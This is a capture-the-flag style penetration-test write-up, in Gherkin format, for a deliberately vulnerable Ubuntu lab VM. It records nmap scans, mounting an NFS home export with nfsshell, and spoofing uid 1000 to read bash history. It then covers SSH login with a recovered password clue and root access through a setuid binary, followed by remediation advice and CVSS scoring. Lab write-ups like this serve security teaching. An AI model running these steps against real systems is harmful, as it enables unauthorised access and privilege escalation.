## Version 1.4.1
## language: en

Feature:
  TOE:
    linesc
  Category:
    Improper Privilege Management
  Location:
    172.16.33.129:2049 TCP
  CWE:
    CWE-250: Execution with Unnecessary Privileges
  Rule:
    REQ.096: https://fluidattacks.com/products/rules/list/096
  Goal:
    Get remote connection and root privileges
  Recommendation:
    Avoid using weak protocols or without proper setting or security updates
    And set system user permissions in the correct way

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | Nmap                       | 7.91     |
    | nfsshell                   | 1.0      |

  TOE information:
    Given a .OVF file
    When I saw its extension
    Then I executed it on vmware
    Then I saw that the machine was running Ubuntu 8.04.4
    And it was requesting an user as it's shown in [evidence] (01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip addr show vmnet1
    """
    And I got the next output
    """
    vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
    inet 172.16.33.1/24 brd 172.16.33.255 scope global vmnet1
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:1/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 172.16.33.0/24
    """
    And the command showed me the next result
    """
    Nmap scan report for 172.16.33.1
    Host is up (0.00021s latency).
    Nmap scan report for 172.16.33.129
    Host is up (0.00053s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 2.57 seconds
    """
    When I analyzed the previous commands output
    Then I knew that 172.16.33.129 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -A 172.16.33.129
    """
    Then I got the next result
    """
    Nmap scan report for 172.16.33.129
    Host is up (0.0012s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu3 (protocol 2.0)
    | ssh-hostkey:
    |   1024 75:51:bc:56:37:e3:ff:6c:dc:7e:61:eb:0f:ef:0f:ba (DSA)
    |_  2048 a6:89:c0:d1:b1:33:0e:3c:85:cb:7c:78:17:b2:17:b8 (RSA)
    111/tcp  open  rpcbind 2 (RPC #100000)
    | rpcinfo:
    |   program version    port/proto  service
    |   100000  2            111/tcp   rpcbind
    |   100000  2            111/udp   rpcbind
    |   100003  2,3,4       2049/tcp   nfs
    |   100003  2,3,4       2049/udp   nfs
    |   100005  1,2,3      32911/tcp   mountd
    |   100005  1,2,3      57290/udp   mountd
    |   100021  1,3,4      34559/udp   nlockmgr
    |   100021  1,3,4      54434/tcp   nlockmgr
    |   100024  1          40383/tcp   status
    |_  100024  1          44885/udp   status
    2049/tcp open  nfs     2-4 (RPC #100003)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    When I appreciated the scan result
    Then I saw that the port 22 was running SSH in its version OpenSSH 4.7p1
    And RCPBIND was using version 2 on port 111
    And NFS was used in its version 2-4 on port 2049

  Scenario: Normal use case
    Given SSH service was working on port 22
    Then I try to access to that port with the next command
    """
    ssh root@172.16.33.129
    """
    Then the system request me for a password [evidence] (02.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given the information previously found
    When I analyzed it in detail
    Then I decided to do an advanced scan on port 2049
    Then I used nmap with the following command
    """
    sudo nmap  -sSUC -p2049 172.16.33.129
    """
    Then I got the next result
    """
    Nmap scan report for 172.16.33.129
    Host is up (0.00018s latency).
    PORT     STATE         SERVICE
    2049/tcp open          nfs
    2049/udp open|filtered nfs
    MAC Address: 00:0C:29:9B:41:4A (VMware)
    """
    Then I downloaded nfsshell from
    """
    https://github.com/NetDirect/nfsshell
    """
    Then I executed it with the next command
    """
    ./nfs
    """
    Then I got the next interface
    """
    nfs>
    """
    Then I executed the next command to set a remote host
    """
    nfs> host 172.16.33.129
    """
    And I got the following output
    """
    Open 172.16.33.129 (172.16.33.129) TCP
    """
    Then I executed the below command
    """
    nfs> export
    """
    Then I saw the following response
    """
    Export list for 172.16.33.129:
    /home/muhammad           *
    """
    Then I mount that directory with the next command
    """
    nfs> mount /home/muhammad
    """
    And thus I looked the below message
    """
    Mount `/home/muhammad', TCP, transfer size 8192 bytes.
    """
    Then with the following command I listed the files in that directory
    """
    nfs> ls -l
    """
    Then the files in that directory were shown
    """
    drwxr-xr-x1000     4096    -11469325010  Dec  3 00:46  .
    drwxr-xr-x1000     4096    -11469325010  Dec  3 00:46  ..
    -rw-------1000      591    -11469325010  Dec  4 04:14  .bash_history
    -rw-r--r--1000      220    -11469325010  Dec  2 00:39  .bash_logout
    -rw-r--r--1000     2940    -11469325010  Dec  2 00:39  .bashrc
    -rw-------1000      502    -11469325010  Dec  3 00:30  .mysql_history
    -rw-r--r--1000      586    -11469325010  Dec  2 00:39  .profile
    drwx------1000     4096    -11469325010  Dec  2 22:54  .ssh
    -rw-r--r--1000        0    -11469325010  Dec  2 00:44  .sudo_as_admin_
    successful
    drwxr-xr-x1000     4096    -11469325010  Dec  4 04:07  vuln
    """
    Then I tried to check one of those files with the next command
    """
    nfs> cat .mysql_history
    """
    And I receive the following message
    """
    .mysql_history: Permission denied
    """
    Then I noted that the files owner had an uid of 1000 [evidence] (03.png)
    Then I used the below command to assign that values as my uid
    """
    nfs> uid 1000
    """
    Then I could executed the next command successfully
    """
    nfs> cat .mysql_history
    """
    When I analyzed the file content
    And I didn't find something wrong
    Then I decided to visualize the bash_history
    """
    nfs> cat .bash_history
    """
    When I analyzed its content
    Then I found a clue [evidence] (04.png)

  Scenario: Exploitation
    Given the clue previously found
    And taking into account that a system user is muhammad
    Then I decided to try access through SSH to the system with that user
    """
    ssh muhammad@172.16.33.129
    """
    When the target's system request me for a password
    Then I used the first name found in the last clue
    Then I got a successful login [evidence] (05.png)
    Then I listed the file directories one more time
    And I got the next result
    """
    total 4
    drwxr-xr-x 6 muhammad muhammad 4096 2020-12-04 04:07 vuln
    """
    Then I listed vuln directory content with the command
    """
    ls -l vuln
    """
    Then I got the next output
    """
    drwxr-xr-x 2 muhammad muhammad 4096 2020-12-02 22:27 1
    drwxr-xr-x 2 muhammad muhammad 4096 2020-12-02 22:36 2
    drwxr-xr-x 2 root     root     4096 2020-12-02 23:04 3
    drwxr-xr-x 2 root     root     4096 2020-12-03 01:26 4
    """
    Then I listed the content of the first directory
    """
    total 24
    drwxr-xr-x 2 muhammad muhammad 4096 2020-12-02 22:27 .
    drwxr-xr-x 6 muhammad muhammad 4096 2020-12-04 04:07 ..
    -rwsrwx--x 1 root     root     8845 2020-12-02 22:23 suid
    -rw-r--r-- 1 root     root       75 2020-12-02 22:23 suid.c
    """
    Then I noted that the owner of the suid file is root
    And that file has a setuid permission enable
    Then I could executed it with the below command
    """
    ./suid
    """
    And I got a root privileges [evidence] (06.png)

  Scenario: Remediation
    Given the system doesn't set the user privileges in the correct way
    And sensitive information is accessed to unprivileged users
    Then it'd better set privileges for the user system in better way
    And thus avoid that a system user executed root files
    And it'd better clean log files which could have sensitive information

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     6.5/10 (Medium) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.4/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.0/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-03-04
